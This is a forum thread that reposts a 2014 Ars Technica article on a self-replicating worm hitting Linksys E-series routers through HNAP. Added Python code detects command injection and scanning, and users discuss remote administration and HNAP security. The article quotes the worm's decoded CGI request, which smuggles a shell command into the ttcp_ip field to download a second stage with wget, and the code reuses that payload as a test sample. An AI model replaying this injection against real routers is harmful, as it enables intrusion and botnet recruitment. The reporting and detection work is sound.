WARNING! Linksys routers infected with self-replicating worm/malware.

IainB:
This could affect a lot of unsuspecting Linksys router users. (I used to use a Linksys WRT120N, which apparently could be a potential target for this worm.)

(Ars Technica post copied below sans embedded hyperlinks/images.)
Bizarre attack infects Linksys routers with self-replicating malware
Some 1,000 devices have been hit by the worm, which seeks out others to infect.
by Dan Goodin - Feb 13, 2014 6:20 pm UTC

Researchers say they have uncovered an ongoing attack that infects home and small-office wireless routers from Linksys with self-replicating malware, most likely by exploiting a code-execution vulnerability in the device firmware.

Johannes B. Ullrich, CTO of the Sans Institute, told Ars he has been able to confirm that the malicious worm has infected around 1,000 Linksys E1000, E1200, and E2400 routers, although the actual number of hijacked devices worldwide could be much higher. A blog post Sans published shortly after this article was posted expanded the range of vulnerable models to virtually the entire Linksys E product line. Once a device is compromised, it scans the Internet for other vulnerable devices to infect.

"We do not know for sure if there is a command and control channel yet," Ullrich wrote in the update. "But the worm appears to include strings that point to a command and control channel. The worm also includes basic HTML pages with images that look benign and more like a calling card. They include images based on the movie "The Moon" which we used as a name for the worm."

The worm works by injecting vulnerable devices with a URL-encoded shell script that carries out the same seek-and-hijack behavior. The exploit may also change some routers' domain name system server to 8.8.8.8 or 8.8.4.4, which are IP addresses used by Google's DNS service. Compromised routers remain infected until they are rebooted. Once the devices are restarted, they appear to return to their normal state. People who are wondering if their device is infected should check for heavy outbound scanning on port 80 and 8080, and inbound connection attempts to miscellaneous ports below 1024. To detect potentially vulnerable devices use the following command:

printf 'GET /HNAP1/ HTTP/1.1\r\nHost: test\r\n\r\n' | nc routerip 8080

Devices that return the XML HNAP output may be vulnerable.

The attack begins with a remote call to the Home Network Administration Protocol (HNAP), an interface that allows ISPs and others to remotely manage home and office routers. The remote function is exposed by a built-in Web server that listens for commands sent over the Internet. Typically, it requires the remote user to enter a valid administrative password before executing commands, although previous bugs in HNAP implementations have left routers vulnerable to attack. After using HNAP to identify vulnerable routers, the worm exploits an authentication bypass vulnerability in a CGI script. (Ullrich isn't identifying the script because it remains unfixed on many older routers, and he doesn't want to make it easier for attackers to target it.) Ullrich said he has ruled out weak passwords as the cause of the Linksys infections.

So far, the only routers Ullrich has observed being compromised in the attack are the E1000, E1200, and E2400 models manufactured by Linksys. Routers running the latest 2.0.06 version of the firmware aren't being infected, leading him to believe that the vulnerability resides only in earlier versions. Unfortunately, no update is available for E1000 models, since they are no longer supported.

Infected devices are highly selective about the IP ranges they will scan when searching for other vulnerable routers. The sample Ullrich obtained listed just 627 blocks of /21 and /24 subnets. The net blocks appear to be targeting various consumer DSL and Cable ISPs worldwide, including Comcast, Cox, Roadrunner, RCN, and Charter in the US. The sample also scanned ranges owned by Bell (DSL) and Shaw (cable) in Canada, Virtua and Telesp in Brazil, RDSNET in Romania, Ziggo in the Netherlands, and Time.Net in Malaysia.

The discovery comes a week after researchers in Poland reported an ongoing attack used to steal online banking credentials, in part by modifying home routers' DNS settings. In turn, the phony domain name resolvers listed in the router settings redirected victims' computers, tablets, and smartphones to fraudulent websites masquerading as an authentic bank service; the sites would then steal the victims' login credentials. Ullrich said that the worm campaign he helped uncover this week appears to be unrelated, since there are no malicious DNS changes involved.

So why might the new attack, in select cases, redirect a router's DNS requests to Google? That remains unclear, though one theory suggests that the changes could allow attackers to bypass DNS policies enforced by specific ISPs.
Consuming bandwidth

The worm came to light earlier this week after the operator of a Wyoming ISP contacted Sans and reported a large number of customers with compromised Linksys routers. As the routers scanned IP ports 80 and 8080 as fast as they could, they consumed the bandwidth of the unidentified ISP's customers, slowed down their legitimate activity, and interrupted streams and VPN connections.

In a comment left in response to this article, ISP operator Brett Glass said the range of devices that are vulnerable is likely much wider than previously determined. He explained:

    The security exploit that's used by the worm will work on all current and recent Linksys routers, including the entire E-series as well as Valet routers and some with "WRT" part numbers (for example, the WRT160). However, this particular worm seems to focus on the E-series and appears to be aimed at marshaling a botnet. So far, it does not appear that the malware flashes itself in, so it can be removed by a reboot. But it appears that any router with stock firmware that's exposed to the Internet can be reinfected even if it has a secure password.

The initial request in the attack typically begins with the strings "GET /HNAP1/ HTTP/1.1" and then "Host: [ip of host]:8080." The following requests look like this:

POST /[withheld].cgi HTTP/1.1
Host: [ip of honeypot]:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Mac_PowerPC)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[ip of honeypot]:8080/
Authorization: Basic YWRtaW46JmkxKkBVJDZ4dmNH

When decoded, the request is translated to:

submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2
&ttcp_ip=-h
    `cd /tmp;if [ ! -e .L26 ];then wget http://[source IP]:193/0Rx.mid;fi`
&StartEPI=1

Ullrich takes this to mean that the worm downloads a second-stage exploit from port 193 of the attacking router. (The port can change, but it is always less than 1024.)

The objective behind this ongoing attack remains unclear. Given that the only observable behavior is to temporarily infect a highly select range of devices, one possible motivation is to test how viable a self-replicating worm can be in targeting routers. Indeed, last March, an anonymous hacker claimed to have built a botnet for more than 420,000 routers, modems, and other Internet-connected devices purely for the fun and knowledge it provided.

As was the case in that unconfirmed campaign, the behavior Ullrich has observed is rare, and it will be worth following Sans as it digs further into this attack. Ullrich has more details here and here.

Article updated throughout to add newly available information.

--- End quote ---
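The indicators the quoted article gives (a shell command smuggled into the ttcp_ip form field of a CGI POST, an XML HNAP reply on port 8080, and routers that fan out to many hosts on ports 80 and 8080) can be checked mechanically. The Python below is an added example written for this page, not code from Ars Technica, SANS or Linksys; the request strings, the HNAP response and the flow records are constructed samples, with 192.0.2.x, 198.51.100.x and 10.0.0.x as placeholder addresses and "/withheld.cgi" standing in for the script name the article withholds.

```python
"""Added example: defensive checks for the indicators in the quoted article.
Not code from Ars Technica, SANS or Linksys; all sample data is constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qs

# ttcp_ip should hold a host address; shell metacharacters never belong in it.
SHELL_META = re.compile(r"[`;|&$]")


def parse_request(raw: str):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def injected_params(body: str) -> list:
    """Names of form fields whose URL-decoded value contains shell metacharacters."""
    fields = parse_qs(body, keep_blank_values=True)
    return [name for name, values in fields.items()
            if any(SHELL_META.search(v) for v in values)]


def classify_request(raw: str) -> list:
    """Tags for one request: HNAP probe, CGI POST, and command injection."""
    method, path, _headers, body = parse_request(raw)
    tags = []
    if method == "GET" and path.startswith("/HNAP1/"):
        tags.append("hnap-probe")
    if method == "POST" and path.endswith(".cgi"):
        tags.append("cgi-post")
        bad = injected_params(body)
        if bad:
            tags.append("cmd-injection:" + ",".join(bad))
    return tags


def looks_like_hnap(response: bytes) -> bool:
    """True when a reply to GET /HNAP1/ is the XML HNAP output the article mentions."""
    head, _, payload = response.partition(b"\r\n\r\n")
    return (head.startswith(b"HTTP/1.") and payload.lstrip().startswith(b"<?xml")
            and b"HNAP" in payload)


def scanner_hosts(flows, min_targets=50) -> list:
    """Sources contacting at least min_targets distinct hosts on port 80 or 8080."""
    targets = defaultdict(set)
    for src, dst, dport in flows:
        if dport in (80, 8080):
            targets[src].add(dst)
    return sorted(src for src, seen in targets.items() if len(seen) >= min_targets)


# Constructed samples; 192.0.2.10 plays the "[source IP]" of the article's decoded body.
PROBE = "GET /HNAP1/ HTTP/1.1\r\nHost: 192.0.2.20:8080\r\n\r\n"
ATTACK = (
    "POST /withheld.cgi HTTP/1.1\r\nHost: 192.0.2.20:8080\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "submit_button=&change_action=&submit_type=&action=&commit=0&ttcp_num=2&ttcp_size=2"
    "&ttcp_ip=-h+%60cd+%2Ftmp%3Bif+%5B+%21+-e+.L26+%5D%3Bthen+wget+"
    "http%3A%2F%2F192.0.2.10%3A193%2F0Rx.mid%3Bfi%60&StartEPI=1"
)
BENIGN = (
    "POST /withheld.cgi HTTP/1.1\r\nHost: 192.0.2.20:8080\r\n\r\n"
    "submit_button=&ttcp_num=2&ttcp_size=2&ttcp_ip=192.168.1.50&StartEPI=1"
)
HNAP_RESPONSE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/xml\r\n\r\n"
                 b'<?xml version="1.0" encoding="utf-8"?><soap:Envelope>'
                 b'<GetDeviceSettingsResponse xmlns="http://purenetworks.com/HNAP1/">'
                 b"</GetDeviceSettingsResponse></soap:Envelope>")
# 10.0.0.5 reaches 60 distinct hosts on port 80 (scanner); 10.0.0.9 reaches three.
FLOWS = ([("10.0.0.5", "198.51.100.%d" % i, 80) for i in range(60)]
         + [("10.0.0.9", "198.51.100.%d" % i, 80) for i in range(3)])

if __name__ == "__main__":
    print(classify_request(PROBE), classify_request(ATTACK), classify_request(BENIGN))
    print(looks_like_hnap(HNAP_RESPONSE), scanner_hosts(FLOWS))
```

The decision in injected_params is deliberately narrow: it only asks whether a field that should carry an address contains characters a shell would interpret, so it flags the article's ttcp_ip payload while leaving an ordinary ping target alone. scanner_hosts implements the article's "heavy outbound scanning on port 80 and 8080" check over per-flow records; the threshold of 50 distinct destinations is an assumption to tune against real traffic.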

Stoic Joker:
Okay... I've only gotten as far as reading the above, but with an exploit that uses an HTTP request to port 8080 as an entry point I can only assume they're targeting the external access remote administration "feature" of the router. A feature that should be either turned off, or highly restricted to start with, methinks.

So is this exploit somehow bypassing configuration imposed restrictions, or is it just targeting the defaults crowd? I'm inclined to think simply turning off remote administration - like it's really used that often by home users - would sufficiently mitigate this but don't want to assume that just yet.



Edit: Looks like SANS confirmed the Remote Administration off = safe hypothesis.

40hz:
Sad part is it all comes down to HNAP. And the problems surrounding it go back at least three years. Good old Cisco. We get people to stop trusting UPnP and they throw in this piece of junk as a replacement. Nice of them to do something to reduce their consumer tech support calls by making things significantly less secure in order to do so.

Good article about that here.  :-\

IainB:
^^ +1 for what 40hz said.    :up:
Good link to the HNAP "Easy NOT EQUALS Secure" article.
So, why, one wonders, did UPnP get excommunicated and HNAP get invited in...?    :tellme:

Some people (not me, you understand) might say that maybe the NSA couldn't hack into peoples' routers easily enough using UPnP, so they and Cisco invented HNAP to do it, but I couldn't possibly comment.

40hz:
^There are those who would say (but you know the sort of things THEY say) that the NSA is behind it all.

In this case, I think it really is Cisco just trying to make their life easy when it comes to products sold to a largely unsophisticated consumer demographic. Sort of like addressing a complaint that your password requirements are too stringent by switching to a 3-digit PIN scheme. If the NSA, or any of the other tri-letter pantheon benefited from any of this, I think it was purely serendipitous for them. Not that they'd complain.

HNAP made it in because Cisco implied that it was far more secure than it actually was to the people most likely to buy it. They were a little more forthright in their whitepaper. (But what average home user is ever going to read let alone understand that?) And you still needed to read between the lines to see their semi-acknowledgement it was dangerously dumbed down when it came to security.

So it goes... :-\
